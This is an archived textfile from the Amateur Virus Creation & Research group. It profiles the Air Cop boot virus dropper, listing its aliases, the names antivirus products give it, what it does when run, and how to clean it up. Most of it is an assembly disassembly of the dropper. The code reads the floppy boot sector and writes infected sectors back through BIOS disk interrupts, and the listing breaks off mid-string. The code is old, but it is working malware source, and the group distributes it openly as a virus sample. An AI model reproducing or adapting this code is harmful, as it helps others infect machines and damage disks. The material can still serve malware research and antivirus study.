💾 Archived View for spam.works › mirrors › textfiles › virus › avcr-01.007 captured on 2023-11-04 at 15:59:46.
⬅️ Previous capture (2023-06-16)
-=-=-=-=-=-=-
??????? ? ? ????????? ? ???????? ? ? ? ? ? ??? ?? ? ? ? ? ? ? ?? ??????????? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?????? ????????? ? ??? ??? ???? ??????? ???? ???????? ? ? ? ??????? ? ??? ? ? ? ? ? ? ?? ? ?? ? ? ? ? ? ? ? ???? ? ? ?? ? ? ? ? ????? ? ? ???????? ? ?? ???????? ?? ? ? ? ? ? ? ? ? ? ??????? ? ? ???????? ? ? ?? ??????? Distributed By Amateur Virus Creation & Research Group (AVCR) ????????????????????????????????????????????????????????????????????????????? Research of the Air Cop Virus by Security Threat Name of Virus: Air Cop ----------------------------------------------------------------------------- Alias: Air Dropper ----------------------------------------------------------------------------- Type Of Code: Not Informed ----------------------------------------------------------------------------- VSUM Information - Resident boot ----------------------------------------------------------------------------- Antivirus Detection: (1) ThunderByte Anti Virus (TBAV) reported aircop.com as dropper2 virus (2) Frisk Software's F-Protect (F-PROT) reported aircop.com as Air Dropper (3) McAfee Softwares Anti Virus (SCAN.EXE) reported aircop.com as Dropper virus (4) MicroSoft Anti Virus (MSAV.EXE) reported aircop.com as Dropper ----------------------------------------------------------------------------- Execution Results: It is a resident boot virus and it installs itself into C:\ giving you an error saying "Non-system disk please replace and hit enter" ----------------------------------------------------------------------------- Cleaning Recommendations: Cleaning is impossible but to rid your machine of the virus a boot off of a boot disk is needed and if drive C: can be acessed it must be reformatted. ----------------------------------------------------------------------------- Researcher's Notes: Reads "STACK!" many times over and gives a warning line then states that the virus is written by RABID development Corp. ----------------------------------------------------------------------------- Disassembly of the AirCop Virus ----------------------------------------------------------------------------- PAGE 59,132 ;========================================================================== ;== == ;== AIRCOP == ;== == ;== Created: 11-Jan-91 == ;== Version: == ;== Passes: 5 Analysis Options on: ABFMNOPU == ;== == ;== == ;========================================================================== movseg macro reg16, unused, Imm16 ; Fixup for Assembler ifidn <reg16>, <bx> db 0BBh endif ifidn <reg16>, <cx> db 0B9h endif ifidn <reg16>, <dx> db 0BAh endif ifidn <reg16>, <si> db 0BEh endif ifidn <reg16>, <di> db 0BFh endif ifidn <reg16>, <bp> db 0BDh endif ifidn <reg16>, <sp> db 0BCh endif ifidn <reg16>, <BX> db 0BBH endif ifidn <reg16>, <CX> db 0B9H endif ifidn <reg16>, <DX> db 0BAH endif ifidn <reg16>, <SI> db 0BEH endif ifidn <reg16>, <DI> db 0BFH endif ifidn <reg16>, <BP> db 0BDH endif ifidn <reg16>, <SP> db 0BCH endif dw seg Imm16 endm keybd_q_head EQU 1AH ; (0040:001A=2CH) keybd_q_tail EQU 1CH ; (0040:001C=2CH) SEG_A SEGMENT BYTE PUBLIC ASSUME CS:SEG_A, DS:SEG_A ORG 100h AIRCOP PROC FAR START: MOV AX,CS MOV DS,AX MOV SP,3B6H MOV AH,0 MOV AL,3 INT 10H ; Video display ah=functn 00h ; set display mode in al MOV DX,52BH MOV AH,9 INT 21H ; DOS Services ah=function 09h ; display char string at ds:dx MOV DX,3C3H MOV AH,9 INT 21H ; DOS Services ah=function 09h ; display char string at ds:dx MOV DX,4E5H MOV AH,9 INT 21H ; DOS Services ah=function 09h ; display char string at ds:dx MOV DX,464H MOV AH,9 INT 21H ; DOS Services ah=function 09h ; display char string at ds:dx MOV DX,480H MOV AH,9 INT 21H ; DOS Services ah=function 09h ; display char string at ds:dx MOV AX,40H MOV ES,AX PUSH WORD PTR ES:keybd_q_tail ; (0040:001C=2CH) POP WORD PTR ES:keybd_q_head ; (0040:001A=2CH) MOV AX,CS MOV ES,AX MOV AH,8 INT 21H ; DOS Services ah=function 08h ; get keybd char al, no echo MOV CX,3 LOCLOOP_1: PUSH CX MOV AX,201H MOV BX,5D0H MOV CX,1 MOV DX,0 INT 13H ; Disk dl=drive a ah=func 02h ; read sectors to memory es:bx POP CX JNC LOC_2 ; Jump if carry=0 LOOP LOCLOOP_1 ; Loop if cx > 0 MOV DX,4F2H MOV AH,9 INT 21H ; DOS Services ah=function 09h ; display char string at ds:dx MOV AX,4CFFH INT 21H ; DOS Services ah=function 4Ch ; terminate with al=return code LOC_2: MOV CX,3 LOCLOOP_3: PUSH CX MOV AX,301H MOV BX,5D0H MOV CX,2709H MOV DX,100H INT 13H ; Disk dl=drive a ah=func 03h ; write sectors from mem es:bx POP CX JNC LOC_4 ; Jump if carry=0 LOOP LOCLOOP_3 ; Loop if cx > 0 MOV DX,50EH MOV AH,9 INT 21H ; DOS Services ah=function 09h ; display char string at ds:dx MOV AX,4CFFH INT 21H ; DOS Services ah=function 4Ch ; terminate with al=return code LOC_4: MOV CX,3 LOCLOOP_5: PUSH CX MOV AX,301H MOV BX,7D0H MOV CX,1 MOV DX,0 INT 13H ; Disk dl=drive a ah=func 03h ; write sectors from mem es:bx POP CX ;* JNC LOC_6 ;*Jump if carry=0 DB 73H, 0EH LOOP LOCLOOP_5 ; Loop if cx > 0 MOV DX,57CH MOV AH,9 DATA_1 DD 0FFB821CDH DATA_2 DD 0BA21CD4CH DB 0E5H, 04H,0B4H, 09H,0CDH, 21H DB 0BAH, 9EH, 05H,0B4H, 09H,0CDH DB 21H,0B8H, 00H, 4CH,0CDH DB 21H DATA_3 DB 'STACK STACK STACK STACK ' DB 'STACK STACK STACK STACK ' DB 'STACK STACK STACK STACK ' DB 'STACK STACK STACK STACK ' DB 'STACK STACK STACK STACK ' DB 'STACK STACK STACK STACK ' DB 'STACK STACK STACK STACK ' DB 'STACK STACK STACK STACK ' DB 'STACK STACK STACK STACK ' DB 'STACK STACK STACK STACK ' DB 'STACK STACK STACK STACK ' DB 'STACK STACK STACK STACK ' DB 'STACK STACK STACK STACK ' DB 'STACK STACK STACK STACK ' DB 'STACK STACK STACK STACK ' DB 'STACK STACK STACK STACK ' DB 0DH, 0AH, 'Attention: This virus ' DB 'sample uses only in research tea' DB 'ms.', 0DH, 0AH, ' Plea' DB 'se do not use in joking or setti' DB 'ng trap on someone.', 0DH, 0AH, 0DH DB 0AH, 'Warning! This file installs' DB ' "